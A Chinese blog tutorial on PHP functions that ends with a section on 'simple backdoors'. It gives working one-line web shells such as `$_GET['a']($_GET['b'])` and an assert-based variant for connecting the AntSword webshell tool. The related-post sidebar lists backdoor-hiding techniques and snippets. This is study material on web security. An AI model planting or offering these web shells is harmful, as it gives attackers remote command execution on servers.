PHP 函数、PHP 简单后门

已于 2023-10-24 17:28:51 修改
阅读量322 收藏
点赞数 3
分类专栏: PHP 文章标签: 1024程序员节 php 开发语言 web安全 网络安全 网络 运维
于 2023-10-24 11:11:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51559599/article/details/134007846
版权

函数

基本结构

语法结构

function 函数名(形式参数1,形式参数2...){
    //函数体
    return 返回值
}

定义并执行一个简单函数

// funtion.php

function test(){
    echo "This is function ".__FUNCTION__;
}

test();

函数传参

// function.php

function add($x, $y){
    $sum = $x + $y;
    return $sum;
}

echo add(10, 3);

函数调用

函数的调用,函数名加上小括号

调用过程

function a(){
    echo "This is func ".__FUNCTION__."<br />";
}

function b(){
    echo __FUNCTION__." is starting...<br />";
    a();
    echo __FUNCTION__." is stopped!<br />";
}

b();

注意

  • 函数的调用,直接函数名字后面加上() 即可,() 可以看作是运算符;
  • 调用函数之后执行的过程是相对独立的,互不干扰,默认没有联系;
  • 函数执行完毕,返回调用的位置继续向下执行。

变量

范围

  • 局部变量
  • 全局变量
  • 超全局变量

函数内部无法直接获取函数外部的变量

函数外部无法直接获取函数内部的变量

局部变量

在函数内部定义的变量,默认情况下,函数外部不能直接访问函数内部定义的变量。

// function.php

function get_name(){
    $username = "GJL";
    echo "My name is {$username}";
}
get_name();

echo $username;     // Notice: Undefined variable: username

全局变量

全局变量是在脚本中,函数或类的外部定义的变量。

// function.php

$username = "GJL";

function get_name(){
    echo "My name is {$username}";
}

get_name();     // Notice: Undefined variable: username

注意

  • PHP 语言中,函数内部是没有办法直接调用函数外部的变量,这一点与 JavaScript 和 Python 不同。

  • 解决方式

    • 函数传参

      $username = "GJL";

function get_name($username){
    echo "My name is {$username}";
}

get_name($username);

    • global 声明全局变量

      // function.php

$username = "GJL";

function get_name(){
    global $username;
    echo "My name is {$username}";
}

get_name();

参数传递

按值传参

默认传参方式。

function add($x, $y){
    $sum = $x + $y;
    return $sum;
}

echo add(10, 3);

对形参的操作,不会改变实参的值。

默认参数

可以给形式参数设置默认值,直接赋值即可

给函数默认值的时候,全都给

function add($x = 0, $y = 0){
    $sum = $x + $y;
    return $sum;
}

// echo add();          // 0
// echo add(10, 3);     // 13
echo add(10);           // 10

可变函数

概述

可变函数也叫变量函数动态函数,函数名可以动态设置和调用,变量()。这是PHP 特性之一,这种特性通常会被攻击者所利用

直接把函数名赋值给变量,通过修改变量的值,可以实现动态调用。PHP 支持可变函数的概念。这意味着如果一个变量名后有圆括号,PHP 将寻找与变量的值同名的函数,并且尝试执行它。

<?php
    function a(){
    echo "This is function a";
}
function b(){
    echo "This is function b";
}
$func_name = "a";
$func_name();  // 相当于 a();
// 可以直接使用变量的值充当函数名
// 执行结果,输出 This is function a
    ?>

危险操作

<?php
    function a(){
    echo "This is function a";
}

function b(){
    echo "This is function b";
}

// a();
// b();

$func_name  = ($_GET['func_name']);
$func_name();                   // a();
                                // b();
                                // phpinfo();
    ?>

直接访问显示错误,此时的 func_name 为空

image-20231024105745753

传参,赋予其参数

修改 GET 中传入的参数

image-20231024105933485

将参数名改为 phpinfo 则调用 phponfo() 函数显示 phpinfo

image-20231024110144246

简单的后门

命令执行

  • php 中 system() 函数可以直接执行系统命令

    system("ipconfig");

  • 在 php 中写入最简单的后门函数

    <?php
    $_GET['a']($_GET['b']);
    ?>

    访问此 php 页面

    image-20231024110739759

    修改传参,成功执行命令

    image-20231024110854862

蚁剑连接

  • eval 为一种语言结构,而非函数,不能动态调用

  • 可以将 assert 当作 a 的参数,b 的参数为一句话木马,连接蚁剑

    • 蚁剑为 POST 传参,需要将传参方式设置为 $_POST$_REQUEST

      <pre>
<?php
    $_GET['a']($_REQUEST['b']);
    ?>

  • 蚁剑连接

    输入传参后的 url

    注意

    assert 一次只能传递一个参数,传递多个参数时需要对传参进行编码

    连接密码为 $_REQUEST['b'] 中的 b

    image-20231024172526535

  • 获取 shell

    image-20231024172714987

gjl_
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
一款php后门 phpspy
10-29
关于phpspy这款php后门可以查看! 很多人也许因为没有使用过,所以不知道作用,我详细的说明一下! http://blog.csdn.net/jinzhai/archive/2007/10/29/1853678.aspx
php隐藏后门,php如何隐藏后门
weixin_39603598的博客
03-09 264
php隐藏后门的方法:1、创建系统隐藏文件;2、利用ADS隐藏文件;3、在php环境变量中留shell;4、设置不死马;5、设置“php.ini”后门;6、将关键字拆分,并进行多文件包含;7、将真正的一句话写入数据库。推荐:《PHP教程》php 后门隐藏技巧1. attrib +s +h创建系统隐藏文件:attrib +s +a +r +hattrib +s +h 文件名在 Windows 10下...
PHP后门
qq_39751956的博客
07-08 250
简单后门解析,密文都会明确以下方法,说白了就是字符串下标字符拼接//$c(原文经过strtr置换后的密文,由 目标字符+替换字符+base64_encode(‘原文内容’)构成)//strtr//substr//52(这个值不一定)//urldecode解析过的字符串提示:以下是本篇文章正文内容,下面案例仅供参考。
PHP_GET后门,躲避任何安全软件
weixin_30813225的博客
01-23 202
经常拿到一些比较好的php站想要留住。插入菜刀一句话,很容易被管理发现,不管是eval还是assert,就是管理发现不了,有时连接也会被各种的安全软件拦截。现在教大家一个简单的技巧。本人一直在用,留的后门没有被删过了。 <?php file_put_contents('xpxp.php',"$_GET[uname]");//此段代码插入它正常的PHP里面,最好插头部。 复制代码利用也很...
PHP后门
qq_41750040的博客
03-28 939
<?php $admin['check'] = false; $password = 'chenff';//ÉèÖÃÃÜÂë $c = "chr"; session_start(); if (empty($_SESSION['PhpCode'])) { $url = $c(104).$c(116).$c(116).$c(112).$c(58).$c(47).$c(47); $...
php后门URL的防范
10-26
这通常发生在开发过程中,由于配置不当或疏忽,使得...通过实施这些策略,开发者可以显著降低PHP后门URL的风险,保护应用程序免受未经授权的访问和恶意活动的侵害。记住,安全是持续的过程,需要不断评估、更新和改进。
PHP编程函数安全
10-27
3. 文件写入函数:`fwrite()`及其变体,如果对用户输入不加过滤,攻击者可能写入PHP后门。确保所有写入操作都经过严格的数据验证和过滤。 4. 文件删除函数:`unlink()`,如果未正确检查删除文件的条件,可能导致...
PHP 危险函数解释 分析
10-30
这些函数如果被不小心或者未经授权地使用,可能导致严重的安全问题,例如执行任意系统命令、泄露敏感信息或者创建后门。下面将详细解释和分析这些函数及其潜在风险。 1. `phpinfo()`:此函数会输出PHP环境的详细...
php无eval后门1
08-03
PHP 无 eval 后门PHP 中的一种常见的后门技术,通过使用 eval 函数、assert 函数、create_function 函数、preg_replace 函数、mb_ereg_replace 函数、回调函数等方式来执行恶意代码。这些方法可以绕过一些安全...
php后门木马常用命令.pdf
10-10
PHP后门木马常用的函数可以分为四种类型:执行系统命令、代码执行与加密、文件包含与生成、.htaccess。 执行系统命令 * system 函数:可以执行系统命令,例如`system($_GET['cmd']);` * passthru 函数:可以执行...
php万能后门程序
09-11
php万能后门操作类,放如任何php程序中即可使用!
渗透学习之PHP--后门
qq_62886656的博客
10-03 1880
渗透学习之php
php nginx func_PHP常见代码执行后门函数(示例代码)
weixin_39943547的博客
03-08 152
PHP常见代码执行后门函数代码执行:应用程序在调用一些能够将字符串转换为代码的函数(例如php中的eval中),没有考虑用户是否控制这个字符串,将造成代码执行漏洞。常见php代码执行函数介绍常用执行代码函数1、eval():eval函数将接受的字符串当做代码执行2、 assert():用法和 eval()一样3、preg_replace():preg_replace 函数一个参数是一个正则表达式,...
PhpStudy 后门分析
晓得哥的博客
09-29 1258
作者:Hcamael@知道创宇404实验室 时间:2019年9月26日 原文链接:https://paper.seebug.org/1044/ 背景介绍 2019/09/20,一则杭州警方通报打击涉网违法犯罪专项行动战果的新闻出现在我的朋友圈,其中通报了警方发现PhpStudy软件被种入后门后进行的侦查和逮捕了犯罪嫌疑人的事情。用PhpStudy的Web狗还挺多的,曾经我还是Web狗的时候也用过几...
php自动生成后门代码,PHP后门代码
weixin_42587866的博客
03-10 988
http://blog.ddian.cn/?post=9801.[代码][PHP]代码$fp = '';$path = '';if(empty($_GET['action'])){if(empty($_GET['path'])){$_path = dirname(__FILE__);}else{if(is_dir($_GET['path'])){$_path = $_GET['path'];}el...
php简单后门实现及php连接数据库
qq_58683895的博客
10-24 944
包含php简单后门的实现代码及操作,以及php连接数据库的操作代码及介绍,和相关php函数的介绍
多种php后门
xxx9686的博客
09-25 446
【代码】多种php后门
php如何开后门,php如何隐藏后门
weixin_35692916的博客
03-18 278
php如何隐藏后门php隐藏后门的方法:1、创建系统隐藏文件;2、利用ADS隐藏文件;3、在php环境变量中留shell;4、设置不死马;5、设置“php.ini”后门;6、将关键字拆分,并进行多文件包含;7、将真正的一句话写入数据库。推荐:《PHP教程》php 后门隐藏技巧1. attrib +s +h创建系统隐藏文件:attrib +s +a +r +hattrib +s +h 文件名解决覆盖...
那些强悍的PHP一句话后门
大方子
08-06 9429
以一个学习的心态来对待PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。 强悍的PHP一句话后门 这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。 利用404页面隐藏PHP小马   PHP   1 2 3 4 ...
php源码扫描后门工具
最新发布
01-23
这种工具的工作原理通常是通过识别常见的后门代码特征,如eval、assert、system等函数的调用,或者是通过检测非常规的文件操作、远程代码执行等可疑行为。一旦发现可能存在后门的代码片段,工具会向开发者报告,以便...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值